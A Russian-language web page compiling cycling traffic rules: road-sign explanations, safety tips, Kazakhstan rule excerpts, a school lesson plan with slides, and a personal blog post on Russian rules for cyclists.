Правила дорожного движения для велосипедистов в картинках

Дорожные знаки для велосипедистов

4.4.1 «Велосипедная дорожка или полоса для велосипедистов»

4.4.2 «Конец велосипедной дорожки или полосы для велосипедистов»

4.5.2 «Пешеходная и велосипедная дорожка с совмещенным движением
(велопешеходная дорожка с совмещенным движением)»

4.5.3 «Конец пешеходной и велосипедной дорожки с совмещенным движением
(конец велопешеходной дорожки с совмещенным движением)»

4.5.4, 4.5.5 «Пешеходная и велосипедная дорожка с разделением движения»

Велопешеходная дорожка с разделением на велосипедную и пешеходную стороны дорожки, выделенные конструктивно и (или) обозначенные горизонтальной разметкой 1.2.1, 1.2.2, 1.23.2 и 1.23.3 или иным способом.

4.5.6, 4.5.7 «Конец пешеходной и велосипедной дорожки с разделением движения
(конец велопешеходной дорожки с разделением движения)»

4.5.1 «Пешеходная дорожка»

Разрешается движение пешеходам и велосипедистам в случаях, указанных в пунктах 24.2 — 24.4 настоящих Правил.

5.11.2 «Дорога с полосой для велосипедистов»

Дорога, по которой движение велосипедистов и водителей мопедов осуществляется по специально выделенной полосе навстречу общему потоку транспортных средств.

5.12.2 «Конец дороги с полосой для велосипедистов»

Дорожный знак представляет собой дорожный знак 5.11.2, изображение которого перечеркнуто диагональной красной полосой из левого нижнего угла в правый верхний угол знака.

5.13.3, 5.13.4 «Выезд на дорогу с полосой для велосипедистов»

5.14.2 «Полоса для велосипедистов»

Действие знаков 5.14-5.14.3 распространяется на полосу, над которой они расположены. Действие знаков, установленных справа от дороги, распространяется на правую полосу.

5.14.3 «Конец полосы для велосипедистов»

Действие знаков 5.14-5.14.3 распространяется на полосу, над которой они расположены. Действие знаков, установленных справа от дороги, распространяется на правую полосу.

5.20 «Искусственная неровность»

Обозначает границы искусственной неровности.
Знак устанавливается на ближайшей границе искусственной неровности относительно приближающихся транспортных средств.

Территория, на которой действуют требования Правил дорожного движения Российской Федерации, устанавливающие порядок движения в жилой зоне.

5.33 «Пешеходная зона»

Место, с которого начинается территория (участок дороги), на которой разрешено движение только пешеходов.

Дорога, на которой действуют требования Правил дорожного движения Российской Федерации, устанавливающие порядок движения по автомагистралям.

5.19.1, 5.19.2 «Пешеходный переход»

При отсутствии на переходе разметки 1.14.1 или 1.14.2 знак 5.19.1 устанавливается справа от дороги на ближней границе перехода относительно приближающихся транспортных средств, а знак 5.19.2 — слева от дороги на дальней границе перехода.

Запрещается въезд всех транспортных средств в данном направлении.

Действие знаков не распространяется:

  • на маршрутные транспортные средства;

Запрещается движение всех транспортных средств.

Знаки 3.2 запрещают движение соответствующих видов транспортных средств в обоих направлениях.

Действие знаков не распространяется:

  • на маршрутные транспортные средства;
  • на транспортные средства организаций федеральной почтовой связи, имеющие на боковой поверхности белую диагональную полосу на синем фоне, и транспортные средства, которые обслуживают предприятия, находящиеся в обозначенной зоне, а также обслуживают граждан или принадлежат гражданам, проживающим или работающим в обозначенной зоне. В этих случаях транспортные средства должны въезжать в обозначенную зону и выезжать из нее на ближайшем к месту назначения перекрестку;
  • на транспортные средства, управляемые инвалидами I и II групп, перевозящие таких инвалидов или детей-инвалидов.

·

3.9 «Движение на велосипедах запрещено»

Запрещается движение велосипедов и мопедов.

Знаки 3.9 запрещают движение соответствующих видов транспортных средств в обоих направлениях.

Правила дорожного движения для велосипедистов в картинках

Как проехать на велосипеде по пешеходному переходу? Можно двигаться на велосипеде по тротуару?

Отвечаем по порядку на все вопросы.

ВЕЛОСИПЕД = АВТОМОБИЛЬ, ВЕЛОСИПЕД = ПЕШЕХОД

Велосипедист — полноправный участник дорожного движения. Велосипед и автомобиль равны на дороге.
Велосипедист — уникальный человек. Когда он движется на велосипеде, он приравнивается к автотранспорту. А когда спешивается — к пешеходу.
Поэтому, запомнить ПДД очень просто: в пешеходных местах надо быть пешеходом, на авто-дорогах — автотранспортом.

Где ехать?
Велосипедисты старше 14 лет должны ехать по проезжей части, в один ряд и как можно ближе к правому краю дороги, но не прижимаясь к бордюру. Прокладывайте маршруты вне дорог с большим количеством развязок.

ПДД
Полезно знать ПДД для автомобилей и соблюдать их основные положения: быть предсказуемым, ездить только на зеленый свет, не ездить по встречной полосе, подавать сигналы о маневрах, обгонять только слева и т. д.
Не создавайте помех другим участникам движения и в каждый момент просчитывайте возможные варианты развития ситуации.

Сигнальные знаки
Велосипедист должен быть заметен на дороге. Велосипед должен иметь звуковой сигнал, белый фонарь или катафот спереди, красный фонарь или катафот сзади и по катафоту на колесах с каждой боковой стороны.

Велозащита
Не забывайте надевать шлем и застегивать его при каждой поездке, выбирайте яркую одежду со светоотражающими элементами для езды в темное время суток.

Тротуары
Тротуар — место для пешеходов. Передвигаться по ним можно только как пешеход (спешившись и вести велосипед рядом с собой).
Так вы не навредите прохожим и не создадите аварийную ситуацию для машин, выезжающих из дворов.
Помните, что автомобилисты рассчитывают, что скорость движения пешехода — 3-5 км/час. И, выезжая из дворов, могут увидеть только людей, находящихся вблизи выезда. Если вы мчитесь на велосипеде по тротуару, вы слишком быстро приблизитесь к автомобилю, который не рассчитывает на такую скорость в пешеходной зоне.

Пешеходный переход (зебра)
Когда вы движетесь по автодороге, вы должны уступать пешеходам, переходящим дорогу по зебре.
Только пешеходу можно пересекать дорогу по зебре! Чтобы пересечь проезжую часть через пешеходный переход, вам следует спешиться и вести велосипед рядом с собой.
Это правило так же гарантирует вам безопасность. Потому-что водители автотранспорта рассчитывают на скорость пешеходов 3-5 км/ч. И быстро движущийся велосипедист по пешеходному переходу может стать причиной ДТП.

Сигналы
Всегда подавайте сигналы руками при маневрах:
Остановка — любая поднятая вверх рука
Правый поворот или перестроение — вытянутая правая рука или согнутая в локте левая рука
Левый поворот или перестроение — вытянутая левая рука или согнутая в локте правая рука

Поворот налево
Нельзя поворачивать налево или разворачиваться на дорогах с трамвайными путями и на дорогах, имеющих больше одной полосы для движения в данном направлении.
Чтобы совершить левый поворот на большом перекрестке, придется на время стать пешеходом и перейти дорогу по пешеходному переходу.
Другой вариант — проехать перекресток прямо, повернуть налево в правом ряду пересекаемой дороги и на зеленый свет вновь проехать перекресток прямо.
На Т-образном перекрестке можно повернуть налево, не создавая помех другим транспортным средствам

Знаки приоритета
На перекрестках действуют обычные правила приоритета, определяемые светофорами и знаками приоритета:
«Главная дорога»
«Уступите дорогу»

Помеха справа
На перекрестке равнозначных дорог уступает тот, у кого есть помеха справа.

Контакт
Вступайте в визуальный контакт с водителями, чтобы они обращали на вас внимание. Можно кивать или махать рукою, если вас пропускают: благодарность стимулирует.

Привлекайте внимание
Используйте звуковой сигнал при приближении к плохо просматриваемому проезду или повороту. Оттуда в любой момент может появиться пешеход или другой велосипедист.

Движение в группе
Двигаясь в группе, соблюдайте интервал не менее 1 метра друг от друга и держитесь не ближе 1 метра от бордюра. Первый в группе велосипедист должен подавать остальным сигналы о маневрах, а также ямах, трещинах и других препятствиях.

Уход за велосипедом
Следите за техническим состоянием велосипеда, регулярно проверяйте исправность тормозов, люфты колес, педалей и рулевого управления, подкачивайте колеса.

Что делать нельзя
1) Ездить в состоянии алкогольного опьянения
2) Говорить по телефону во время управления велосипедом
3) Не держаться за руль хотя бы одной рукой

4) Перевозить пассажиров

5) Перевозить грузы, выступающие за габариты больше, чем на полметра, или мешающие управлению велосипедом

6) Ездить по проезжей части при наличии велодорожки

7) Ездить по дорогам, обозначенным знаками:
«Автомагистраль»
«Дорога для автомобилей»
«Пешеходная зона»
«Движение на велосипеде запрещено»

ПДД ДЛЯ ВЕЛОСИПЕДИСТОВ В КАЗАХСТАНЕ

Итак Правила
1.2 В Правилах используются следующие основные понятия:
безопасность дорожного движения — состояние дорожного движения, отражающее степень защищенности его участников и государства от дорожно-транспортных происшествий и их последствий;
велосипед — транспортное средство, кроме инвалидных колясок, имеющее два колеса или более и приводимое в движение мускульной силой людей, находящихся на нем;
пешеход — лицо, находящееся вне транспортного средства на дороге и не производящее на ней работу. К пешеходам приравниваются лица, передвигающиеся в инвалидных колясках без двигателя, ведущие велосипед, мопед, мотоцикл, везущие санки, тележку, детскую или инвалидную коляску;
темное время суток — промежуток времени от конца вечерних сумерек до начала утренних сумерек;
1.3 На территории Республики Казахстан установлено правостороннее движение транспортных средств.
ОБЯЗАННОСТИ ПЕШЕХОДОВ
3.1 Пешеходы должны двигаться по тротуарам или пешеходным дорожкам, а при их отсутствии — по обочинам, а также в соответствии с требованиями пунктов 17.1 и 17.4 Правил.
Пешеходы, перевозящие или переносящие громоздкие предметы, а также лица, передвигающиеся в инвалидных колясках без двигателя, могут двигаться по краю проезжей части (на дорогах с разделительной полосой — по внешнему краю проезжей части), если их движение по тротуарам или обочинам создает помехи для других пешеходов.
При отсутствии тротуаров, пешеходных дорожек или обочин, а также в случае невозможности двигаться по ним пешеходы могут двигаться по велосипедной дорожке или идти в один ряд по краю проезжей части (на дорогах с разделительной полосой — по внешнему краю проезжей части).
Вне населенных пунктов при движении по проезжей части пешеходы должны идти навстречу движению транспортных средств.
Лица, передвигающиеся в инвалидных колясках без двигателя, ведущие мотоцикл, мопед, велосипед по краю проезжей части, должны следовать по правой стороне дороги по ходу движения транспортных средств.
МАНЕВРИРОВАНИЕ

8.2 Сигналом маневра в левую сторону является включенный световой указатель левого поворота либо вытянутая в сторону левая рука либо правая, вытянутая в сторону и согнутая в локте под прямым углом вверх. Сигналом маневра в правую сторону является включенный световой указатель правого поворота либо вытянутая в сторону правая рука либо левая, вытянутая в сторону и согнутая в локте под прямым углом вверх. Сигнал торможения подается стоп-сигналом либо поднятой вверх рукой.
Подача сигнала указателями поворота или рукой должна производиться заблаговременно до начала выполнения маневра и прекращаться немедленно после его завершения (подача сигнала рукой может быть закончена непосредственно перед выполнением маневра). При этом сигнал не должен вводить в заблуждение других участников движения.
Подача сигнала не дает водителю преимущества и не освобождает его от принятия мер предосторожности.
8.3 При выезде на дорогу с прилегающей территории водитель должен уступить дорогу транспортным средствам и пешеходам, движущимся по ней, а при съезде с дороги — пешеходам и велосипедистам, путь движения которых он пересекает.
8.4 При подъезде к месту остановки или стоянки водитель должен уступить дорогу движущимся по краю проезжей части или обочине пешеходам, водителям велосипедов, мопедов, гужевых повозок, погонщикам верховых и вьючных животных.

ОСТАНОВКА И СТОЯНКА

12.2 Ставить транспортное средство на проезжей части разрешается в один ряд параллельно краю проезжей части, за исключением тех мест, конфигурация (местное расширение проезжей части) которых допускает иное расположение транспортных средств. Двухколесные транспортные средства без бокового прицепа допускается ставить в два ряда.
Стоянка на краю тротуара, граничащего с проезжей частью, с полным или частичным заездом на него, разрешается только легковым автомобилям, мотоциклам, мопедам и велосипедам при условии, что это не будет препятствовать движению пешеходов.

ДВИЖЕНИЕ ПО АВТОМАГИСТРАЛЯМ

16.1 На автомагистралях запрещается:
движение пешеходов, домашних животных вне транспортного средства, движение велосипедов, мопедов, тракторов и самоходных машин, а также иных транспортных средств, скорость которых по технической характеристике или их состоянию меньше 40 км/ч; (в общем если медленно, то нельзя)
24.1 Управлять велосипедом, гужевой повозкой (санями), быть погонщиком вьючных, верховых животных или стада при движении по дорогам разрешается лицам не моложе 14 лет , а мопедом — не моложе 16 лет.
24.2 Велосипеды, мопеды, гужевые повозки (сани), верховые и вьючные животные должны двигаться только по крайней правой полосе в один ряд возможно правее. Допускается движение по обочине, если это не создает помех пешеходам.
Колонны велосипедистов, гужевых повозок (саней), верховых и вьючных животных при движении по проезжей части должны быть разделены на группы по 10 велосипедистов, верховых и вьючных животных и по 5 повозок (саней). Для облегчения обгона расстояние между группами должно составлять 80-100 м.
24.3 Водителям велосипеда и мопеда запрещается:
ездить, не держась за руль хотя бы одной рукой;
перевозить пассажиров, перевозить груз, который выступает более чем на 0,5 м по длине или ширине за габариты, или груз, мешающий управлению, двигаться по дороге при наличии рядом велосипедной дорожки;
поворачивать налево или разворачиваться на дорогах с трамвайным движением и на дорогах, имеющих более одной полосы для движения в данном направлении.
Запрещается буксировка велосипедов и мопедов, а также велосипедами и мопедами, кроме буксировки прицепа, предназначенного для эксплуатации с велосипедом или мопедом.
24.4 На нерегулируемом пересечении велосипедной дорожки с дорогой, расположенном вне перекрестка, водители велосипедов и мопедов должны уступить дорогу транспортным средствам, движущимся по этой дороге.

Какие знаки запрещают движение на велосипедах?

Добрый день, уважаемый читатель.

Ранее на pddmaster.ru были опубликованы несколько статей, посвященных правилам дорожного движения для велосипедистов. Однако в них не было уделено достаточного внимания дорожным знакам, распространяющимся на велосипеды.

На практике может сложиться следующая ситуация. Человек, который постоянно ездит на автомобиле, решил в выходной прокатиться на велосипеде. Велосипедные правила он отлично знает, а вот со знаками есть определенные трудности. Например, в парках можно встретить знак «Пешеходная дорожка». Поскольку велосипедист занимает промежуточное положение между пешеходом и автомобилем, довольно сложно сразу же вспомнить, разрешено ли движение под указанный знак.

В этой статье речь пойдет о том, какие знаки запрещают движение велосипедов, а на какие велосипедист может не обращать внимания:

Знаки, запрещающие движение велосипедистов

Перечисленные выше знаки запрещают движение велосипедистов во всех случаях.

Знаки, разрешающие движение велосипедистов в некоторых случаях

Пешеходная дорожка

По пешеходной дорожке могут двигаться:

  • Велосипедисты младше 14 лет (пункты 24.3 и 24.4 ПДД);
  • Велосипедисты старше 14 лет, которые сопровождают велосипедистов младше 14 лет или перевозят ребенка младше 7 лет (пункт 24.2 ПДД);
  • Велосипедисты старше 14 лет, если нет возможности двигаться по велосипедной или велопешеходной дорожке, полосе для велосипедистов, обочине, правому краю проезжей части (пункт 24.2 ПДД).

Пешеходная зона

В пределах пешеходных зон на велосипедах могут двигаться только велосипедисты младше 14 лет.

Обратите внимание, знаки пешеходная дорожка и пешеходная зона довольно похожи и их можно легко перепутать. Однако значения у них сильно различаются:

Презентация по ПДД на тему: «Велосипедисты».

Идёт приём заявок

Подать заявку

Для учеников 1-11 классов и дошкольников

Выбранный для просмотра документ 6-7кл.Слайды к конспекту.pptx

Описание презентации по отдельным слайдам:

Велосипедист — водитель транспортного средства

Велосипедист • Велосипед – транспортное средство, имеющее два колеса и более и приводимое в движение мускульной силой человека. • Велосипедист – это главная фигура в обеспечении дорожного движения. • Управлять велосипедом при движении по дорогам Правилами дорожного движения разрешается лицам не моложе 14 лет, а мопедом – не моложе 16 лет. • Велосипедист является водителем транспортного средства, поэтому к нему предъявляются такие же требования, как и к любому водителю.

Движение на велосипеде Движение на велосипеде не разрешается на большинстве улиц городов, в населённых пунктах и на автомобильных дорогах. Велосипед как транспортное средство имеет свои особенности. Во-первых, он приводится в движение не двигателем, а мускульными усилиями велосипедиста. Следовательно, его скорость зависит от физической натренированности водителя. Во-вторых, велосипед обладает высокой манёвренностью. В-третьих, характеризуется недостаточной устойчивостью. Поэтому необходимо серьёзно учиться езде на велосипеде, быть готовым к различным ситуациям, которые могут возникнуть на дороге.

Основные требования к техническому состоянию велосипеда: Велосипедист должен быть правильно одет(шлем, перчатки, наколенники, подлокотники) ● Велосипед всегда должен иметь исправные тормоза и звуковой сигнал. ● При движении на дорогах в тёмное время суток велосипед должен быть оборудован впереди фонариком (фарой) белого цвета, сзади фонарём или световозвращателем красного цвета.

Велосипедист имеет право управлять велосипедом, который оборудован звуковым сигналом и светоотражателями: спереди – белого цвета, по бокам – оранжевого, сзади – красного. При движении в темное время суток и в условиях недостаточной видимости на велосипеде должен быть установлен и включен фонарь (фара)

Двигаться по дороге на велосипедах разрешается лицам, достигшим 14-летнего возраста, ближе к правому краю проезжей части.

Велосипедисты, двигаясь группами, должны ехать друг за другом, чтобы не мешать другим участникам дорожного движения. Колонна велосипедистов, движущаяся по проезжей части, должна быть разделена на группы (до 10 велосипедистов в группе) с дистанцией движения между группами 80-100 м.

Велосипедист может перевозить только такие грузы, которые не мешают управлять велосипедом и не создают препятствий другим участникам дорожного движения.

Если велосипедная дорожка пересекает дорогу вне перекрестка, велосипедисты обязаны уступить дорогу другим транспортным средствам, движущимся по дороге.

П о зебре велосипед можно только вести за руль! Перед пешеходным переходом необходимо остановиться, пропустить пешехода.

Сигналы, подаваемые велосипедистами:

Велосипедисту запрещается: а)управлять велосипедом с неисправным тормозом, звуковым сигналом, а в темное время суток и в условиях недостаточной видимости – с выключенным фонарем (фарой) или без светоотражателей; б)двигаться по автомагистралям и дорогам для автомобилей, а также по проезжей части, если рядом обустроена велосипедная дорожка

Запрещается двигаться по тротуарам и пешеходным дорожкам (кроме детей до 7 лет на детских велосипедах под присмотром взрослых). При наличии велосипедной дорожки – двигаться только по ней!

ЗАПРЕЩАЕТСЯ во время движения держаться за другое транспортное средство.

Запрещается: -ездить, не держась за руль, и снимать ноги с педалей (подножек); -буксировать велосипеды; -буксировать прицеп, не предусмотренный для эксплуатации с велосипедом.

Дорожные знаки для велосипедистов

1 2 3 Какой знак не разрешает движение велосипедисту?

Объясни правила проезда перекрёстка

1.Какой из знаков относится к велосипедистам: 2.Кто нарушает правила дорожного движения: №1, №2, 3№, №4, , все едут правильно 3. Определи сигналы велосипедиста: поворот налево- поворот направо- остановка- 4.Кто из велосипедистов нарушает правила:1,2 6.Разрешено ли велосипедисту ехать под данный знак: разрешено, 1 1 2 1 8 7 6 5 4 3 2 1 3 2 1 4 3 3 2 1 2 5 4 21 3 1 5. Найди запрещающие знаки для велосипедиста: 1, 2, 3, 4, 5 1, 2, 3, 4, 5, 6, 7, 8 все нарушают запрещено.

Велосипедист, будь осторожен на дороге!

Использованные источники: 1.https://yandex.ru/images/search?img_url=http%3A%2F%2Fcs624925.vk.me%2Fv624925452%2F36516%2FsjbKHAfaOVU.jpg&text=картинки%20с%20велосипедистами&noreask=1&pos=4&lr=20117&rpt=simage 2.https://yandex.ru/images/search?img_url=http%3A%2F%2Fwww.school-46.info%2Fimages%2FBEZOPASNOST%2FveloPDD-01.jpg&_=1457938132412&p=1&text=велосипедисты%20и%20правила%20дорожного%20движения&noreask=1&pos=45&rpt=simage&lr=20117 3.https://yandex.ru/images/search?img_url=https%3A%2F%2Fgifujets.files.wordpress.com%2F2012%2F04%2Fjitennsya.jpg&_=1457938132414&p=3&text=велосипедисты%20и%20правила%20дорожного%20движения&noreask=1&pos=97&rpt=simage&lr=20117 4.https://yandex.ru/images/search?img_url=https%3A%2F%2Fgifujets.files.wordpress.com%2F2012%2F04%2Fjitennsya.jpg&_=1457938132414&p=3&text=велосипедисты%20и%20правила%20дорожного%20движения&noreask=1&pos=97&rpt=simage&lr=20117

Выбранный для просмотра документ конспект.docx

Тема внеклассного занятия по ПДД: «Дополнительные требования к велосипедистам, движение группами». 6-7 класс.

Цель: углубить знания учащихся о правилах управления велосипедами.

-расширять знания о требованиях к техническому состоянию велосипеда, о значении дорожных знаков велосипедистов, о сигналах велосипедистов;

-формировать навыки безопасного поведения при управлении велосипедами;

-воспитывать ответственность за самостоятельное управление велосипедом.

Оборудование: обучающее видео, презентация по теме, проверочные карточки на каждого обучающегося.

С наступлением тепла на дорогах столицы появляется все больше двухколесных транспортных средств. Будь то велосипед, мопед или скутер. Их водители, в основном – несовершеннолетние подростки, которые находятся в наибольшей опасности, так как двухколесный транспорт, в отличие от автомобильного, не защищен кузовом. Тому свидетельство – статистика ГИБДД по Москве, ежедневно сообщающая о случаях Дорожно-транспортных происшествий с участием водителей велосипедов, мопедов и скутеров на дорогах.

К сожалению, фиксируется резкий всплеск числа ДТП с участием водителей велосипедов, мопедов и скутеров. В большинстве случаев ими управляют молодые люди, которые очень слабо владеют навыками вождения, плохо знают правила дорожного движения, нередко грубо пренебрегая этими правилами, становятся участниками дорожных аварий. А водители автомобилей со своей стороны также в какой-то степени забыли о велосипедистах, которые могут неожиданно появиться при перестроении или совершении иного маневра. В результате аварий гибнут, теряют здоровье и калечатся те, кто относятся к наиболее активной, трудоспособной части населения. Нередко увечья получают и несовершеннолетние – будущее нашей страны.

По статистике, три четверти из общего числа происшествий с участием мототранспорта – столкновения с автомобилями.

Поэтому водителям велосипеда, мопеда и скутера надо знать Правила Дорожного Движения и владеть ситуацией на дороге. Знание ПДД – это самая верная гарантия безопасности.

2.Презентация «Велосипедист- водитель транспортного средства». СЛАЙД №1.

СЛАЙД №2. Велосипед – транспортное средство, имеющее два колеса и более и приводимое в движение мускульной силой человека. Велосипедист – это главная фигура в обеспечении дорожного движения. Управлять велосипедом при движении по дорогам Правилами дорожного движения разрешается лицам не моложе 14 лет, а мопедом – не моложе 16 лет. Велосипедист является водителем транспортного средства, поэтому к нему предъявляются такие же требования, как и к любому водителю.

Движение на велосипеде(ОСОБЕННОСТИ).СЛАЙД №3.

Движение на велосипеде не разрешается на большинстве улиц городов, в населённых пунктах и на автомобильных дорогах. Велосипед как транспортное средство имеет свои особенности. Во-первых, он приводится в движение не двигателем, а мускульными усилиями велосипедиста. Следовательно, его скорость зависит от физической натренированности водителя. Во-вторых, велосипед обладает высокой манёвренностью. В-третьих, характеризуется недостаточной устойчивостью. Поэтому необходимо серьёзно учиться езде на велосипеде, быть готовым к различным ситуациям, которые могут возникнуть на дороге.

СЛАЙД №4-6. Основные требования к состоянию велосипеда:

Велосипедист должен быть правильно одет(шлем, перчатки, наколенники, подлокотники). Велосипед всегда должен иметь исправные тормоза и звуковой сигнал.

При движении на дорогах в тёмное время суток велосипед должен быть оборудован впереди фонариком (фарой) белого цвета, сзади фонарём или световозвращателем красного цвета.

СЛАЙД №7: Двигаться по дороге на велосипедах разрешается лицам, достигшим 14-летнего возраста, ближе к правому краю проезжей части.

СЛАЙД №8. Движение группами:

Велосипедисты, двигаясь группами, должны ехать друг за другом, чтобы не мешать другим участникам дорожного движения. Колонна велосипедистов, движущаяся по проезжей части, должна быть разделена на группы (до 10 велосипедистов в группе) с дистанцией движения между группами 80-100 м.

СЛАЙД №9. Перевозка грузов:

Велосипедист может перевозить только такие грузы, которые не мешают управлять велосипедом и не создают препятствий другим участникам дорожного движения.

СЛАЙД №10-11. Проезд перекрёстков и пешеходных переходов:

Если велосипедная дорожка пересекает дорогу вне перекрестка, велосипедисты обязаны уступить дорогу другим транспортным средствам, движущимся по дороге.

СЛАЙД №12. Сигналы велосипедистов.

СЛАЙД №13. Как должен поступить водитель автомобиля?(пропустить).

СЛАЙД №14. Разрешается ли перевозить пассажиров на велосипеде?(ответы обучающихся).

СЛАЙД №15-18. Велосипедисту запрещается:

а)управлять велосипедом с неисправным тормозом, звуковым сигналом, а в темное время суток и в условиях недостаточной видимости – с выключенным фонарем (фарой) или без светоотражателей;
б)двигаться по автомагистралям и дорогам для автомобилей, а также по проезжей части, если рядом обустроена велосипедная дорожка;

в)двигаться по тротуарам и пешеходным дорожкам (кроме детей до 7 лет на детских велосипедах под присмотром взрослых). При наличии велосипедной дорожки – двигаться только по ней!

г)во время движения держаться за другое транспортное средство;

д)ездить, не держась за руль, и снимать ноги с педалей (подножек);

ж)буксировать прицеп, не предусмотренный для эксплуатации с велосипедом.

Помните: велосипед, мопед и скутер – средства передвижения повышенной опасности, а водители этих транспортных средств рискуют в 8 раз больше, чем водители и пассажиры легковых автомобилей.

СЛАЙД №19-20. Знаки для велосипедистов.

СЛАЙД №21.Велосипедист-равный на дороге.

СЛАЙД №22-26. Объяснить правила проезда перекрёстка (ответы и разбор ответа обучающегося).

Обучающимся раздаются проверочные карточки с заданиями, которые необходимо выполнить самостоятельно. Затем- совместная проверка. СЛАЙД №28(2).

Велосипедист, будь внимателен на дороге! СЛАЙД №29.

Правила дорожного движения для велосипедистов в картинках

ПДД для велосипедистов

Давно и всем известно что любое правило написано кровью. Не просто так с потолка взято потому что кому то захотелось. А именно потому что кто то не сделал так и поплатился.
Я, как гордая обладательница транспортного средства, читала ПДД перед тем как выехать на улицы города. Сейчас катаясь нарушаю одну часть из свода правил. Но люди относятся с пониманием и частенько меня же ещё отругают что я не сказала им подвинуться. Ну как отругают.. скажут что зря я мучилась ползя за ними и надо было давно сказать. И многие уже слыша приближение велосипеда заранее компонуются. Есть конечно те кто предпочитает не сдвинуться с места на узкой дорожке и стать счастливым обладателем синяка, но речь не них.
Итак.. В своде ПДД РФ ( от 1996 года с изменениями (последнее от 7. 05. 2003 года). Полный текст правил доступен в сети. ) есть следующие слова:

«Велосипед» — транспортное средство, кроме инвалидных колясок, имеющее два колеса или более, и приводимое в движение мускульной силой людей, находящихся на нем. Таким образом, под понятие «велосипед» попадают и веломобили, и трехколесные велосипеды и тандемы и правила для них (если не оговорено иное) одинаковы.

Замечу: велосипедист который не едет на велосипеде, а ведет его рядом не является водителем, а является пешеходом. Водитель — лицо управляющее каким либо транспортным средством.

Обращу ваше внимание: велосипед не является «механическим транспортным средством» — транспортным средством (кроме мопеда) приводимым в движение двигателем. Это важно понимать, так как в правилах часто даются указания именно для Механических транспортных средств, что к нам отношения не имеет.

Согласно ПДД водитель перед поездкой должен убедиться в исправности своего ТС. И! при»неисправности рабочей тормозной системы, не горящих (отсутствующих) фарах и задних габаритных огнях в темное время суток или в условиях недостаточной видимости…. Движение запрещено».
Далее по списку езда в состоянии опьянения.
Водителю велосипеда запрещается (пункт правил 2.7): управлять тс (или передавать управление тс) лицам находящимся в состоянии опьянения (алкогольного, наркотического или иного), под воздействием лекарственных препаратов ухудшающих внимание и реакцию, в болезненном или утомленном состоянии, ставящим под угрозу безопасность движения.
Да, пьяным на велосипеде ездить также нельзя, как и на автомобиле. И так как вы водитель ТС то ГИБДД имеет право освидетельствовать и наложить штраф.
«Пользоваться во время движения телефоном не оборудованным техническим устройством, позволяющим вести переговоры без рук » ДА!Это тоже нельзя! Вообще считаю глупым затыкать уши когда от слуха зависит сохранность шкурки собственной.

Вот это правило я нарушаю. Я честно боюсь ездить по проезжей части. Ездок я не очень хороший и среди автомобилистов встречаются не хорошие люди.
«Пешеходы должны двигаться по тротуарам или пешеходным дорожкам, а при их отсутствии — по обочинам».
Другими словами, слез с байка — изволь покинуть проезжую часть дороги и перейти на тротуар. Если нет ни обочины, ни тротуара, то пешеход может даже идти по велодорожке, что кстати сказать, запрещено ему когда есть тротуар или возможность идти по обочине. А что делать, когда совсем нет ничего? То есть, в наличии проезжая часть, справа, скажем, пропасть, а слева просто обрыв? Печальная картина: ни деревца, ни велодорожки… В этом случае пешеходу разрешается идти в один ряд по проезжей части. Как? Читаем дальше пункт правил 4.1. «Вне населенных пунктов при движении по проезжей части пешеходы должны идти навстречу движению транспортных средств» . Так значит что? Сломался велик, слезай, переходи на другую сторону и иди навстречу потоку? Нет, создатели правил подумали о нас, и написали следующее: «Лица … ведущие велосипед должны следовать по ходу движения транспортных средств».

Важным кажется пункт правил 24. его можно привести практически полностью:
24.1 Управлять велосипедом, гужевой повозкой (санями) быть погонщиком вьючных, верховых животных или стада при движении по дорогам разрешается лицам не моложе 14 лет (по решению отдельных субъектов РФ возраст может быть снижен до 12 лет) Казалось бы, а что делать с детьми, которые массово катаются на великах лет с трех? Есть два нюанса: во-первых запрещено движение только по дороге: а во дворах, подворотнях, пустырях и помойках вполне разрешено. Во-вторых, ребенка (до 7 летнего возраста) можно перевозить на велосипеде, если существует специально оборудованное дополнительное сиденье с прочными подножками.
Что делать с 7 до 14 ? В этом возрасте дети хорошо усваивают большие объемы информации, и за эти семь лет вполне можно выучить дополнительно к школьному курсу ряд иностранных языков. Важно помнить — процент ДТП с велосипедистами — детьми крайне высок, едва ли не более половины всех ДТП, и допускать их на проезжую часть действительно крайне опасно.

Ребенку свойственно отвлекаться, суетиться, неадекватно реагировать на окружающую обстановку, и даже наличие взрослого человека рядом не делает его поездку по шоссе безопасной.
И!Есть правило ПДД которое нарушают 9 из 10 велосипедистов: запрещено ездить по пешеходному переходу.Нужно спешиться и перейти пешком.А пешеход должен переходить дорогу УБЕДИВШИСЬ ЧТО ВСЕ ТС ЕГО ПРОПУСКАЮТ И ПЕШЕХОД НЕ СОЗДАЁТ АВАРИЙНУЮ ОБСТАНОВКУ.
Понятно, что велосипеды быстрее пешеходов и водители автомобилей не всегда успевают заметить появление велосипедиста на переходе, что ведёт к ДТП. Причём водитель автомобиля виновным в данном случае не будет, так как он обязан пропускать только пешеходов. Так что при любом исходе столкновения велосипедисту придётся оплатить ремонт автомобиля.

И повторю:
24.8. Велосипедистам и водителям мопедов запрещается:

управлять велосипедом, мопедом, не держась за руль хотя бы одной рукой;
перевозить груз, который выступает более чем на 0,5 м по длине или ширине за габариты, или груз, мешающий управлению;
перевозить пассажиров, если это не предусмотрено конструкцией транспортного средства;
перевозить детей до 7 лет при отсутствии специально оборудованных для них мест;
поворачивать налево или разворачиваться на дорогах с трамвайным движением и на дорогах, имеющих более одной полосы для движения в данном направлении;
двигаться по дороге без застегнутого мотошлема (для водителей мопедов);
пересекать дорогу по пешеходным переходам.
24.9. Запрещается буксировка велосипедов и мопедов, а также буксировка велосипедами и мопедами, кроме буксировки прицепа, предназначенного для эксплуатации с велосипедом или мопедом.

Вы конечно можете сказать «ой! Да ладно!» Но каждое правило написано кровью. СОвсем недавно был репортаж о том как мальчишка погиб на пешеходном переходе. Мальчик 11 лет. Не спешился, не посмотрел по сторонам что бы убедиться что его пропускают. Отец был далеко от пацана. Кто виноват в гибели? Я считаю что отец. Потому как не объяснил парню как нужно..
Так что советую подумать прежде чем нарушать. Ответственность за свою шкурку несёте только вы

Ссылка на основную публикацию
Adblock
detector
